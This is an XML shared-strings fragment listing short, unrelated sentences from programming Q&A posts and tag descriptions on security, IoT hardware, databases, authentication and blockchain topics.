    <t>The core library (using the  interface) is the underlying library that organises data in a tree-like structure and handles all locking, passivation, eviction and replication characteristics of data in the cache.</t>
  </si>
  <si>
    <t>Its very useful for quickly finding and removing at least some potential security problems before a program is widely released to the public.</t>
  </si>
  <si>
    <t>By developing DApps based on ASCH, you can have an independent blockchain without being affected by other chains, at the same time get the complete capabilities and greatest degree of control over your blockchain.</t>
  </si>
  <si>
    <t>It has equally been secured from writing good and bad files, or entering good and bad database transactions.</t>
  </si>
  <si>
    <t>Spell-checkers validate user-entered text by leveraging large collections of words, names, and even technical terms or slang.</t>
  </si>
  <si>
    <t>In this isolation level it's possible that a transaction reads data that is not yet committed and possibly will be rolled back and never exist.</t>
  </si>
  <si>
    <t>These event messages can be distributed (pushed) to the subscribers in the reliable manner based on the Event Grid Subscriptions.</t>
  </si>
  <si>
    <t>Novelty detection is the identification of new or unknown data that a machine learning system has not been trained with and was not previously aware of, with the help of either statistical or machine learning based approaches.</t>
  </si>
  <si>
    <t>The purpose of a  is to protect an object, data structure or section of code so that only one thread can access it at a time (this is similar to the Java synchronized keyword).</t>
  </si>
  <si>
    <t>Used for simple text messages that log transaction and
activity information kept by the store for audit and other purposes.</t>
  </si>
  <si>
    <t>UI controllers such as  and fragments are primarily intended to display UI data, react to user actions, or handle operating system communication, such as permission requests.</t>
  </si>
  <si>
    <t>Despite being abstract, the base implementation of NSOperation does include significant logic to coordinate the safe execution of your task.</t>
  </si>
  <si>
    <t>In particular, removing an event handler while that event handler is currently running can lead to memory corruption, which will result in crashes (as you have seen) or other strange behaviors.</t>
  </si>
  <si>
    <t>Gitolite is an open source software to manage a collection of Git repositories on a server accessible by SSH, without creating local accounts for the users.</t>
  </si>
  <si>
    <t>These SDKs are typically run inside your AWS cloud (such as a Lambda)
There are multiple reasons why you should opt for the HTTP based SDK :
The aws-iot-device-sdk is specifically targeted toward devices "living" outside of Aws (IoT gateways / devices in the field) that need to remotely connect.</t>
  </si>
  <si>
    <t>non-standard HTTP header supported by Apache to offload the process of serving large static files from dynamic scripts (eg: PHP, Python, Perl) after they have performed the necessary authorization or restriction logic.</t>
  </si>
  <si>
    <t>There are several third party vendor solutions which provide row-level security / dynamic data masking:
GreenSQL
Informatica DDM
Axiomatics Data Access Filter MD
Additional information and vendors are listed on Wikipedia.</t>
  </si>
  <si>
    <t>When copy the helloWorld binary to raspBerry by TFTP and give it execution permissions with chmod, the next error appears:
"Illegal instruction"
If make a 'file' over binary I get:
"raspberry: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped"
This is because I used "-static -static-libstdc++" when linking.</t>
  </si>
  <si>
    <t>For example, an object that processes customer information may depend on other objects that access the data store, validate the information, and check that the user is authorized to perform updates.</t>
  </si>
  <si>
    <t>It allows developers and businesses to discover application usage patterns, analyze user data, log exceptions, trace problems and monitor app performance anonymously.</t>
  </si>
  <si>
    <t>For TCP, the "Additional address" is the 7-byte Modbus application protocol header (MBAP), consisting of transaction identifier, protocol identifier, and a length field (2 bytes each), plus a single byte identifying the unit/slave (usually 255, though for a gateway, this would be the ID of the RTU slave behind it).</t>
  </si>
  <si>
    <t>Glacier is intended to provide durable and secure long-term storage for the purposes of archiving and backing up of larger amounts of data, ultimately intended to compete with backup and storage systems that companies often must maintain.</t>
  </si>
  <si>
    <t>They consist of a set of guidelines for making content accessible, primarily for disabled users, but also for all user agents, including highly limited devices, such as mobile phones.</t>
  </si>
  <si>
    <t>This other service has no handshake, and given that both Arduinos are identical the best idea that I can think of is to alter an element of the information presented to the WMI database so that I can search in the new service for the altered information.</t>
  </si>
  <si>
    <t>Windows grants or denies access and privileges to resources based on access control lists (ACLs), which use SIDs to uniquely identify users and their group memberships.</t>
  </si>
  <si>
    <t>So, when your accessing items , you are really reading memory after assigned array, which may be unassigned or assigned for something else, making your code vulnerable to data corruption or cause access violation exceptions.</t>
  </si>
  <si>
    <t>Snort is a open source network intrusion detection/prevention system (NIDS/NIPS) that combines the benefits of signature, protocol, and anomaly-based inspection.</t>
  </si>
  <si>
    <t>Common causes are:
Locks that only get released after some user interaction, for example a user might have forgotten to commit a database transaction, causing other transactions to wait for that lock.</t>
  </si>
  <si>
    <t>The open threats keep servicing open requests until these are done and new requests will be serviced using the new updated versions.</t>
  </si>
  <si>
    <t>Secure
Policy-based micro-segmentation
Defining secure network policy used to be reserved for skilled network engineers.</t>
  </si>
  <si>
    <t>The process of forming tokens from an input stream is called tokenization or lexical analysis.</t>
  </si>
  <si>
    <t>These keys are used for testing purposes but in the live products they use different ways to authenticate by scanning the RFID.</t>
  </si>
  <si>
    <t>A smartcard reader is a peripheral device that can be connected to computer or an embedded system (or any similar device) in order to empower that device with the capability to communicate with smartcards.</t>
  </si>
  <si>
    <t>For this, JWT specification (RFC7519) defines a verification method which include token signing or encryption.</t>
  </si>
  <si>
    <t>Verify that the specified computer name is valid, that the computer is accessible over the
network, and that a firewall exception for the WinRM service is enabled and allows access from this computer.</t>
  </si>
  <si>
    <t>My solution was to use the esp8266 to establish a private area network with both esp's acting as a station and an access point (AT+CIPMODE=3).</t>
  </si>
  <si>
    <t>If the compiler barrier isn't the proper solution for this, then how could I go about preventing any outside code from "leaking" into the critical region?</t>
  </si>
  <si>
    <t>So i'm trying to develop a program integrating a raspberry pi with a fingerprint reader using a USB adapter.</t>
  </si>
  <si>
    <t>Solution Trial 2 (MotionEye OS)
Next try was to install the motioneye-OS on my Raspberry which is a special OS build for camera surveillance.</t>
  </si>
  <si>
    <t>When I try to register the program using:
C:\windows\system32\regsvr32.exe 
It fails and says that the program "may not be compatible with this version of Windows that you're running.</t>
  </si>
  <si>
    <t>I am trying to communicate with the arduino and get the data saved in the microSD, where it has user and password, and then move to the sqlite database, however I stopped in that part where it returns me that error.</t>
  </si>
  <si>
    <t>I have just received a RaspberryPi and installed the software on an SD card, but when the Raspberry Pi boots up and asks for the login, the default login and password information won't work.</t>
  </si>
  <si>
    <t>It is important that the fd is invalid in another process (except when passed by special mechanisms such as Android's Binder mechanism.</t>
  </si>
  <si>
    <t>Once you initiate an interrupt, the internal clock on the arduino is compromised and therefore cannot be used reliably until leaving the interrupt.</t>
  </si>
  <si>
    <t>Finally, rsync is double-sided program, you can instead configure rsync on the other end, and 
tell it to use SSH instead of rsync protocol for communicating with your Galileo server.</t>
  </si>
  <si>
    <t>The 64-bit version only allows certified drivers to be installed, there is very little money in selling these apps to justify the expense.</t>
  </si>
  <si>
    <t>Should you need to control create and exclusivity, you'll need to use open to open the file and fdopen it to a FILE type file handle.</t>
  </si>
  <si>
    <t>A "null pointer" is something more abstract: a special value that applicable functions should recognize as being invalid.</t>
  </si>
  <si>
    <t>If you really want to change the HID interface, then, at a minimum, you would have to reprogram the firmware of your G29 device in order to change that descriptor and change the HID report it describes.</t>
  </si>
  <si>
    <t>http://lewiscomputerhowto.blogspot.ca/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html?m=1
It also gives tips on the process of pen testing.</t>
  </si>
  <si>
    <t>Header files are just source code generally containing declarations of function signatures for code contained in other modules or libraries.</t>
  </si>
  <si>
    <t>You can specify the label of the gpiocontroller as described in device tree file format and you can query the gpiocontroller label using , they may be not unique and they don't let you identify the gpio.</t>
  </si>
  <si>
    <t>If you do not have the crash and your program can continue data is not modified by itself and stay uninitialized.</t>
  </si>
  <si>
    <t>Obfuscation is the deliberate act of making source or machine code difficult to understand by humans.</t>
  </si>
  <si>
    <t>Uses SSH by default, so there is no special software to be installed on the nodes you manage.</t>
  </si>
  <si>
    <t>Veracode provides automated static and dynamic application security testing software and remediation services</t>
  </si>
  <si>
    <t>The process of recovering passwords from data that have been stored or transmitted by a computer system.</t>
  </si>
  <si>
    <t>copying or locking a file, creating a mutex or a process, allocating memory, etc.</t>
  </si>
  <si>
    <t>Deciphering refers to the process of decoding a cipher into normal, understandable text.</t>
  </si>
  <si>
    <t>Network Service Discovery (NSD) allows the identification of devices on the local network that support the services your software requests.</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications.</t>
  </si>
  <si>
    <t>And, true issue identification should be reported to the mule component owners.</t>
  </si>
  <si>
    <t>Unless another tag is included expect a information protection centric answer</t>
  </si>
  <si>
    <t>Pact is a language for developing smart contracts to run on a fast deterministic blockchain.</t>
  </si>
  <si>
    <t>Authorization is the process of determining whether a user, program or device is allowed to access a protected resource in a particular way.</t>
  </si>
  <si>
    <t>A software bug that disappears or alters its behavior when one attempts to probe, study, or isolate it.</t>
  </si>
  <si>
    <t>A software token is a type of two-factor authentication security device that may be used to authorize the use of computer services.</t>
  </si>
  <si>
    <t>The technologies are divided into three main areas: Security, Reliability, and Transactions.</t>
  </si>
  <si>
    <t>Cryptographic credentials are often designed to expire after a certain period, although this is not mandatory.</t>
  </si>
  <si>
    <t>Zombie processes cannot be killed since they are already dead and
waiting for their parent processes to reap them.</t>
  </si>
  <si>
    <t>It uses SSH and Python by default, so there is no special software to be installed on the nodes you manage.</t>
  </si>
  <si>
    <t>Barcode verification equipment exists to grade barcodes according to the international barcode quality specification ISO/IEC 15416 (1D) and ISO/IEC 15415 (2D).</t>
  </si>
  <si>
    <t>The Terms of Service for many games directly prohibits cheating activity.</t>
  </si>
  <si>
    <t>This declarative approach means you don't have to record and playback actions and you don't have to inspect your fakes after running code.</t>
  </si>
  <si>
    <t>squid), or by maintaining a cache locally), and/or running a virus scanner, on downloaded files.</t>
  </si>
  <si>
    <t>RMStore adds blocks and notifications to StoreKit, plus receipt verification and transaction persistence.</t>
  </si>
  <si>
    <t>Experimental full verification mode, which does the same verification
work as Bitcoin Core.</t>
  </si>
  <si>
    <t>contactless smartcard, NFC tag) and an application configured to act or pretend to emulate the functional responses of an NFC card.</t>
  </si>
  <si>
    <t>The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library.</t>
  </si>
  <si>
    <t>Growing test suite to verify correctness of new ports.</t>
  </si>
  <si>
    <t>In this instance there is no reason to use OAuth2 and prompt a user to give you access to there information, its your information you already have access.</t>
  </si>
  <si>
    <t>If you store sensitive information on your Mac, you can use FileVault encryption to protect the files from being seen or copied.</t>
  </si>
  <si>
    <t>Key Vault streamlines the key management process and enables you to maintain control of keys that access and encrypt your data.</t>
  </si>
  <si>
    <t>The main reason for this is the provability of functional programs' properties, 
and security is very important nowadays.</t>
  </si>
  <si>
    <t>Another important step of algorithm design is proof of correctness.</t>
  </si>
  <si>
    <t>Prefix will also automatically track key details associated within many of these technologies.</t>
  </si>
  <si>
    <t>And it has been designed from the ground up with security in mind, so that apps are isolated from each other and from the host system.</t>
  </si>
  <si>
    <t>Character devices allows communication between user space and the kernel in a way that is not structured around any specific predetermined way.</t>
  </si>
  <si>
    <t>Application code can be put into an enclave via special instructions and software made available to developers via the Intel SGX SDK.</t>
  </si>
  <si>
    <t>With Audit.NET you can generate tracking information about operations being executed.</t>
  </si>
  <si>
    <t>Web3j provides code generation tools for Java and Android applications to deploy and interact with smart contracts on the blockchain.</t>
  </si>
  <si>
    <t>ConfigMaps are useful for storing and sharing non-sensitive, unencrypted configuration information.</t>
  </si>
  <si>
    <t>Oracle Database Vault
Tool provided by Oracle to protect sensitive data and prevent unauthorited changes to the database.</t>
  </si>
  <si>
    <t>This results in an introduction of risk into the last risk gate prior to the deployment of a new application.</t>
  </si>
  <si>
    <t>This means that a database server that is ACID compliant can guarantee that it has not violated any constraints, even when a transaction fails to complete.</t>
  </si>
  <si>
    <t>It also ships with a Rational Team Concert client that can be used for both source control and defect management.</t>
  </si>
  <si>
    <t>Notwithstanding the possibility of bugs, plug-ins must be used as documented for the property to hold.</t>
  </si>
  <si>
    <t>Mainly, the Supremas BioMini allows enrolling fingerprint and the subsequent identification of that fingerprint using the biometric device.</t>
  </si>
  <si>
    <t>The body of this
  document, except for the security considerations section, is taken
  directly from that specification.</t>
  </si>
  <si>
    <t>Another way (and one that works sometimes when the first way doesn't) is through the Ctrl-Alt-Delete keystroke combination, which was developed as an easy way to reboot a computer that would nevertheless be an unlikely accidental keystroke combination.</t>
  </si>
  <si>
    <t>Java Card has some features that are not present in J2SE as well: application isolation through the so-called applet firewall and a transaction mechanism.</t>
  </si>
  <si>
    <t>Also, any issues resulting from using such tools without permission from the target are your own risk; we do not endorse such actions in any way.</t>
  </si>
  <si>
    <t>I have an experience with having the ownCloud data folder on /srv/data (also ownCloud 7.0 on Ubuntu Server 14.04 VPS), the permissions are 770 and the owner is www-data:www-data, and in the ownCloud config file, I use the line
'datadirectory' =&gt; '/srv/data',
I would not recommend using 777 permissions, as it is not a good security practice in general.</t>
  </si>
  <si>
    <t>I haven't worked with 802.15.4 in years, but outside of Ember Desktop (only available from Silicon Labs in expensive development kits) I was pleased with the Ubiqua Protocol Analyzer.</t>
  </si>
  <si>
    <t>First you will need to find some identifying information for the USB drive.</t>
  </si>
  <si>
    <t>Information about connecting to Bluetooth 3.0 or lower devices from stock OS iOS devices is only available after being accepted into Apple's MFi program.</t>
  </si>
  <si>
    <t>Previous:
 Not sure which Ethernet shield/board you are using, but typically they use SPI protocol to communicate over pins 10-13.</t>
  </si>
  <si>
    <t>calculating a value to withing a certain tolerance) and the act of verifying or determining the 'closeness' of a value to a another (e.g.</t>
  </si>
  <si>
    <t>When computers got faster and people got more security-conscious, this was no longer acceptable.</t>
  </si>
  <si>
    <t>program is also used to verify that a language or system is operating correctly.</t>
  </si>
  <si>
    <t xml:space="preserve">
Embeddable Reporting lets you run IBM Cognos Business Intelligence reports within your Bluemix environment.</t>
  </si>
  <si>
    <t>The foreign key is typically a primary key of an entity it is related to.</t>
  </si>
  <si>
    <t>COMSOL offers 24h support for users with a registered software licence.</t>
  </si>
  <si>
    <t>Azure DDoS protection is described at https://review.docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview.</t>
  </si>
  <si>
    <t>A single slip-up in system design or execution can allow successful attacks.</t>
  </si>
  <si>
    <t>Using stored procedures is also a part of the security management of database systems.</t>
  </si>
  <si>
    <t>Because eval will run any code in its host language, a hacker may use an eval statement to run his own code, and thus compromise the system.</t>
  </si>
  <si>
    <t>Resources
GitHub repository
Blog
Documentation
Technical Report on the CleverHans Adversarial Examples Library</t>
  </si>
  <si>
    <t>It aims to provide an out-of-the-box solution for JWT authentication which avoids some of the common pitfalls of the JWT specification.</t>
  </si>
  <si>
    <t>It is aimed to be portable and efficient with focus on security and interoperability.</t>
  </si>
  <si>
    <t>Here's the two simple programs:
and
On my Mac, I open two SSH terminals to the Raspberry Pi.</t>
  </si>
  <si>
    <t>On computer you can use a waitKey() fucntion to get command from the keyboard whereas on raspberry pi there's not a keyboard and I don't want to use ssh to kill the process but operate the raspberry pi only.</t>
  </si>
  <si>
    <t>Since it couldn't connect because there was no IP and Password it opened up in AP mode and I connected to it from my computer and logged into it.</t>
  </si>
  <si>
    <t>What is at the overwritten memory before the corruption may have something to do with the parameter message.</t>
  </si>
  <si>
    <t>But it does not support for getting the device information when the event handled.</t>
  </si>
  <si>
    <t>Second, it acts on behalf of IoT Hub to authenticate modules and child devices so that they can continue to operate.</t>
  </si>
  <si>
    <t>SecurEntity is a .NET data protection library for Entity Framework.</t>
  </si>
  <si>
    <t>Every sidechain is also a blockchain, which operates separately with its own nodes.</t>
  </si>
  <si>
    <t>Source: Wikipedia (Distributed lock manager)</t>
  </si>
  <si>
    <t>Leon is an automated system for verifying, repairing, and synthesizing Scala programs.</t>
  </si>
  <si>
    <t>It is automatically enabled with AddressSanitizer (ASAN), but can also operate independently.</t>
  </si>
  <si>
    <t>The protocol was original developed by Cisco in the 1990s to assist in enrolling routers and other other network devices.</t>
  </si>
  <si>
    <t>The Open Web Application Security Project (OWASP) is an organization that wants to inform people about application security.</t>
  </si>
  <si>
    <t>avrdude: Version 6.3-20171130
         Copyright (c) 2000-2005 Brian Dean, http://www.bdmicro.com/
         Copyright (c) 2007-2014 Joerg Wunsch
avrdude: ser_open(): can't open device "\.\COM10": Access is denied.</t>
  </si>
  <si>
    <t>Fortify, the software application security products and services from Micro Focus.</t>
  </si>
  <si>
    <t>Bitdefender is an antivirus software suite developed by Romania-based software company Softwin.</t>
  </si>
  <si>
    <t>Mitigate risk for every feature on your roadmap.</t>
  </si>
  <si>
    <t>IdentityServer4 is officially certified by the OpenID Foundation and thus spec-compliant and interoperable.</t>
  </si>
  <si>
    <t>The use of plperlu should be carefully reviewed for security conscious environments.</t>
  </si>
  <si>
    <t>An open source wrapper for using the iOS keychain.</t>
  </si>
  <si>
    <t>Windows based SSL certificate tool</t>
  </si>
  <si>
    <t>When it has identified a new tweet, it sends a signal to an Arduino which triggers a solenoid to dispense a free product sample (currently sunscreen)
this line of code appears to be the problem/obsolete:
I've registered a Developer account with Twitter, so I have the consumer secret and token codes etc.</t>
  </si>
  <si>
    <t>WS-Trust is a WS-* specification and OASIS standard that provides extensions to WS-Security, specifically dealing with the issuing, renewing, and validating of security tokens, as well as with ways to establish, assess the presence of, and broker trust relationships between participants in a secure message exchange.</t>
  </si>
  <si>
    <t>To reduce jitter and to reduce the potential for losing data from masked interrupts, programmers attempt to minimize the execution time of a FLIH, moving as much as possible to the SLIH.</t>
  </si>
  <si>
    <t>For programming questions about the Snips Platform, which is software that enables "private-by-design", decentralized voice assistants.</t>
  </si>
  <si>
    <t>But what if i need to implement it with python and how will i install a SSL certificate locally on my RPI (i want some short of open source SSL certificate as i am doing this as local project as of now.)</t>
  </si>
  <si>
    <t>Instead of collecting and validating user input, the masking approach restricts the inputs that a user can make in the first place.</t>
  </si>
  <si>
    <t>I need to create a wireless network with no Internet access with a Pi, because I need to communicate to it with an Android smartphone and a laptop, but being the RPi the highest step in the network hierarchy.</t>
  </si>
  <si>
    <t>As we can create server instances and run applications with ease on eclipse, I tried putting eclipse on the Raspberry Pi and use it through ssh, but it proved to be too heavy for the board to handle.</t>
  </si>
  <si>
    <t>A security anti-pattern in which secure information is "protected" by making it "hard to find" in the mistaken belief that it is then secure.</t>
  </si>
  <si>
    <t>Conversely, a query holding a Sch-S lock blocks a concurrent
  transaction that attempts to acquire a Sch-M lock.</t>
  </si>
  <si>
    <t>Do you have a team of service technicians filling out paper forms or struggling with legacy systems to enter data?</t>
  </si>
  <si>
    <t>The problem domain is then completely independent of the required infrastructure (testing, databases, security, etc.).</t>
  </si>
  <si>
    <t>But I am wondering if it is a threat to issue the same private key to many devices, that if one device's key is stolen, the whole service on the server side is compromised.</t>
  </si>
  <si>
    <t>Bellow is backtrac from gdb:
# gdb --args gammu --identify
GNU gdb (Raspbian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.</t>
  </si>
  <si>
    <t>This scanner MUST ONLY take the picture of the fingerprint and not to process neither validate the fingerprint because all of this will be done in a computer.</t>
  </si>
  <si>
    <t>I'm trying to understand (and subsequently implement) the crc16 verification employed by the clean flight quadrocopter firmware for the srxl package verification.</t>
  </si>
  <si>
    <t>I do have a question about the best practice for AWS IoT devices, should I create a certificate per device or should I use one certificate for multiple devices or per device type?</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/rest/api/iot-dps/runtimeregistration/registerdevice
I have not understand how to pass the body information like structure of JSON.I know I have to use x509 as Attestation type but how I will form is it like 
Or if its a json then what will be the name of attribute ?</t>
  </si>
  <si>
    <t>Note that when I used this approach, the pi was not exposed to the outside world, so I did not check this approach for possible security weaknesses.</t>
  </si>
  <si>
    <t>Another option is to tweak the IIS hosting TFS and enabling Basic Authentication (see Team Foundation Server, Authentication, and Access.</t>
  </si>
  <si>
    <t>If that upgrade processor in any other way that rom gets corrupt and the boot code instead crashes the computer rather than booting it.</t>
  </si>
  <si>
    <t>Not that this matters, as a module is cleared as a whole when Python exits, there is no real chance for a memory leak here.</t>
  </si>
  <si>
    <t>This gives you any root access you may need during development without compromising the device security and allowing app processes to run as root.</t>
  </si>
  <si>
    <t>Any device exposed to unsolicited requests like this is at risk of being attacked and can pose a risk to other systems on the network.</t>
  </si>
  <si>
    <t>For this reason, it is important to check the protocol used by the device on the specifications and create a program accordingly.</t>
  </si>
  <si>
    <t>A software or a piece of computer hardware that can intercept and log traffic passing over a digital network or part of a network</t>
  </si>
  <si>
    <t>If a transaction leaves the database in an illegal state, it is aborted and an error is reported.</t>
  </si>
  <si>
    <t>Certification Revocation is a process through which we make sure that certificates that are no longer valid are not used by the relying clients</t>
  </si>
  <si>
    <t>gulp-buster can be used standalone as part of a build task, or in conjunction with gulp-watch to update the cache buster hashes as the files are modified.</t>
  </si>
  <si>
    <t>The EIC has the format of a regular bankcard, with printed identity information on the surface (such as personal details and a photograph) as well as an embedded microchip.</t>
  </si>
  <si>
    <t>Etherscan allows you to explore and search the Ethereum blockchain for transactions, addresses, tokens, prices and other activities taking place on Ethereum</t>
  </si>
  <si>
    <t>Notification - can notify the system administrator, or another computer program, via an API, that something is wrong with one of the monitored Redis instances.</t>
  </si>
  <si>
    <t>ISO/IEC 19794-1:2011 describes the general aspects and requirements for defining biometric data interchange formats.</t>
  </si>
  <si>
    <t>When certutil is run on a certification authority without additional parameters, it displays the current certification authority configuration.</t>
  </si>
  <si>
    <t>While it is officially termed "Rivest Cipher 4", the RC acronym is alternatively understood to stand for "Ron's Code"[6] (see also RC2, RC5 and RC6).</t>
  </si>
  <si>
    <t>In the first step of the process, the security system identifies who the user is by requiring the user to submit some sort of identification.</t>
  </si>
  <si>
    <t>Credentials are saved in special folders on your computer called vaults.</t>
  </si>
  <si>
    <t>It seeks to make algorithms explicit and data structures transparent.</t>
  </si>
  <si>
    <t>PHPASN1 can also read BER encoded binary data into separate PHP objects that can be manipulated by the user and reencoded afterwards.</t>
  </si>
  <si>
    <t>Intentionally obfuscating code can be used to protect the meaning, functionality, or method of operation of source code.</t>
  </si>
  <si>
    <t>A UCIP request is sent to one of the Account Information and Refill (AIR) servers available within the network, and either a response or a Fault is returned.</t>
  </si>
  <si>
    <t>This is due to the insecure default settings, which are designed to get a developer up and running quickly.</t>
  </si>
  <si>
    <t>Missing or inappropriately chosen keys
Keys are a fundamental part of database design and data integrity.</t>
  </si>
  <si>
    <t>Others cover matters such as validation or can be place holders for methods associated with the particular object.</t>
  </si>
  <si>
    <t>Unlike blockchain smart contracts and dApps, Holochain apps do not use global consensus or leader selection algorithms, tokens, or central ledgers.</t>
  </si>
  <si>
    <t>Memory leaks are particularly important for developers to be wary of, as they can be extremely difficult to debug.</t>
  </si>
  <si>
    <t>id is a case-sensitive string representing the unique ID of the element being sought.</t>
  </si>
  <si>
    <t>Blocking the application flow until information required to continue is entered, as for example a password in a login process.</t>
  </si>
  <si>
    <t>Since UTF8 is a superset of ISO8859-7, the app that calls the servlet ensures all characters sent are legitimate for ISO8859-7.</t>
  </si>
  <si>
    <t>Network Security Services (NSS) is a set of libraries designed and maintained by Mozilla to support cross-platform development of security-enabled client and server applications.</t>
  </si>
  <si>
    <t>Also, are you looking for a regular expression for input validation (which needs to be rather strict), or do you need one for information extraction (which can be somewhat relaxed)?</t>
  </si>
  <si>
    <t>), and an old question has risen again:
Should I split my data log files in parts, to prevent a total corruption of a single file?</t>
  </si>
  <si>
    <t>But in the end, they all break down to a single principle: 
You need some hardware device that can encrypt your data as it comes and proves it hasn't been tampered with, e.g.</t>
  </si>
  <si>
    <t>Generally these socket file descriptor allotted are hidden from user but can still be retrieved by use if fileno() call.</t>
  </si>
  <si>
    <t>The sequences are typically stored in files and one of them is referred to as the Public key while the other is the Private key.</t>
  </si>
  <si>
    <t>Mobile Information Device Profile is a set of Java ME specifications.</t>
  </si>
  <si>
    <t>Connect: Retrieve the transactions of a user quickly, with meta tagging and classification.</t>
  </si>
  <si>
    <t>It uses Apache Kafka for messaging, and Apache Hadoop YARN to provide fault tolerance, processor isolation, security, and resource management.</t>
  </si>
  <si>
    <t>This document describes how to enable and configure ProGuard as well as use the retrace tool to decode obfuscated stack traces.</t>
  </si>
  <si>
    <t>Hashcat is the worlds fastest CPU-based password recovery tool.</t>
  </si>
  <si>
    <t>DDC does support untyped Dart code, but it will typically result in less readable and less efficient ES6 output.</t>
  </si>
  <si>
    <t>Efficient
Encoding data to BSON and decoding from BSON can be performed very quickly
in most languages due to the use of C data types.</t>
  </si>
  <si>
    <t>Specifically:
NB: The Yn uses Bonjour services for auto-discovery on a wireless network.</t>
  </si>
  <si>
    <t>If your question is not pertaining specifically to the private key (usage/encoding/etc.</t>
  </si>
  <si>
    <t>An open source password self service application for LDAP directories.</t>
  </si>
  <si>
    <t>I want to also mitigate typical household router NAT &amp; Dynamic IP issues.</t>
  </si>
  <si>
    <t>A packet consists of control information and user data, which is also known as the payload.</t>
  </si>
  <si>
    <t>I have an iOS app that I have written and maintain, and was wondering what would be a good way to lock down the device to a BLE microcontroller.</t>
  </si>
  <si>
    <t>What is the standard procedure to store the user credentials on the device.</t>
  </si>
  <si>
    <t>In none SECURE mode, my program is good:</t>
  </si>
  <si>
    <t>In UWP,apps can access certain file system locations by default, please refer to File access permissions in MSDN.</t>
  </si>
  <si>
    <t>Turbo Power LockBox is an open source encrypting library for Delphi Pascal dialect.</t>
  </si>
  <si>
    <t>Data Protection Manager is a product from the Microsoft System Center suite that provides data protection and recovery for Microsoft products, by leveraging the capabilites of the VSS layer.</t>
  </si>
  <si>
    <t>Access violation when try get xml node
Access violation when using DocumentElement In XMLDocument
Delphi: EInvalidPointer when trying to access XMLDocument
Issue building an XML document using TXMLDocument
etc.</t>
  </si>
  <si>
    <t>the more theoretic ones) are better asked in the Cryptography Stack Exchange site (still in beta).</t>
  </si>
  <si>
    <t>HIPAA in this context refers to the data transmission standards mandated by the U.S. healthcare privacy act.</t>
  </si>
  <si>
    <t>What are the best practices to secure my server as much as possible?</t>
  </si>
  <si>
    <t>You no longer need to be part of the MFI program or jailbreak the device for most purposes.</t>
  </si>
  <si>
    <t>If you use keys for SSH login and don't do anything non-standard for HTTP, you should be plenty good.</t>
  </si>
  <si>
    <t>In a project, the signature file should precede the associated code file.</t>
  </si>
  <si>
    <t>Jointly developed at Oracle, Red Hat, Fujitsu, Intel, SUSE, STRATO and many others, Btrfs is licensed under the GPL and open for contribution from anyone.</t>
  </si>
  <si>
    <t>It works using an ad hoc model-based approach, with the best possible security.</t>
  </si>
  <si>
    <t>This process doesn't guarentee the data hasn't been corrupted, but is a good indication.</t>
  </si>
  <si>
    <t>Password-based Encryption Standard from RSA laboratories.</t>
  </si>
  <si>
    <t>As an example https://gitlab.example.com:50000
If your external URL does not start with https, change it to begin with https
The part in bold will be your &lt;your domain name&gt;
Generate the certificates
Follow the Let's Encrypt install instructions on this link: https://letsencrypt.org/howitworks/
I'm not copying the instructions since they may change (as the program is in open beta right now).</t>
  </si>
  <si>
    <t>More often its used to run the lua script written beforehand to implement more powerful features.You may use it to play games automatically to gain more score and coins, even use it to simulate human operations to test your program with nobody.You have to jailbreak the device before installing AutoTouch.</t>
  </si>
  <si>
    <t>It consists of the following structure:
Global Navigation: Branding (corporate and application logo), links to core applications, usern ame, login and help
Application Navigation: Typically a tab bar on the left and the search box on the right.</t>
  </si>
  <si>
    <t>The Apple notary service is an automated system that scans your software for malicious content, checks for code-signing issues, and returns the results to you quickly.</t>
  </si>
  <si>
    <t>During the extended support Phase, Microsoft continues to provide security updates; however, free technical support, warranty claims, and design changes are no longer being offered.</t>
  </si>
  <si>
    <t>I started a project where you can "log in" on a terminal (basically a Raspberry Pi with a touchscreen attached) with a wireless token (for time tracking).</t>
  </si>
  <si>
    <t>To log into an account, a user is typically required to authenticate oneself with a password or other credentials for the purposes of accounting, security, logging, and resource management.</t>
  </si>
  <si>
    <t>reCAPTCHA is a system originally developed at Carnegie Mellon University that uses CAPTCHA to help digitize the text of books while protecting websites from bots attempting to access restricted areas.</t>
  </si>
  <si>
    <t>Trying to find any information regarding storing local information on Azure Sphere MT3620 device if the connection was lost.</t>
  </si>
  <si>
    <t>It provides a fairly full set of information from validating a document, and can be used as the basis of subsequent transformations.</t>
  </si>
  <si>
    <t>Because ProGuard makes your application harder to reverse engineer, it is important that you use it when your application utilizes features that are sensitive to security like when you are Licensing Your Applications.</t>
  </si>
  <si>
    <t>How it would work is that I plan to create a program in php that would communicate with the rasperry pi where the rasperry pi will be connected to the locks through the usb controller, and once it has receive command it will be able to interact with the locks.</t>
  </si>
  <si>
    <t>token
  This report would have more information with
  "Show verbose output during compilation"
  enabled in File &gt; Preferences.</t>
  </si>
  <si>
    <t>I appreciate that this wouldn't be a typical use case for such a device, but we are just playing around in the office and I'm trying to make life easier to authenticate against the device.</t>
  </si>
  <si>
    <t>(For the testing described above, I removed the udev rules I added to allow access to my regular user account, and rebooted and replugged the device afterwards.)</t>
  </si>
  <si>
    <t>Downloading from
  'http://mxr.mozilla.org/seamonkey/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1'...
  Couldn't retrieve the file using the supplied information.</t>
  </si>
  <si>
    <t>Basically, any device with wireless internet capabilities, since that is the only wireless protocol Android uses - besides Bluetooth (or NFC).</t>
  </si>
  <si>
    <t>4B5B is not a "protocol" or a level 1 or level 2 network specification, meaning that if you try to connect two devices "using 4B5B" you will still have far too many unspecified details to be able to actually create a connection over which you can exchange data.</t>
  </si>
  <si>
    <t>There's also a convenience macro PSTR() to make string literals live in program memory without the need to introduce another PROGMEM-qualified identifier.</t>
  </si>
  <si>
    <t>Your current design is easier to manage -- routers on the network will always report their sensor readings.</t>
  </si>
  <si>
    <t>If you really are interested in implementing the signing process yourself, this test suite may help you figure out what's going wrong.</t>
  </si>
  <si>
    <t>If this is the case than in my opinion you only have few options:
have a look into the sources of the firmata driver and try to shrink the source between cli() and sei()` to reduce the time that the interupts are locked.</t>
  </si>
  <si>
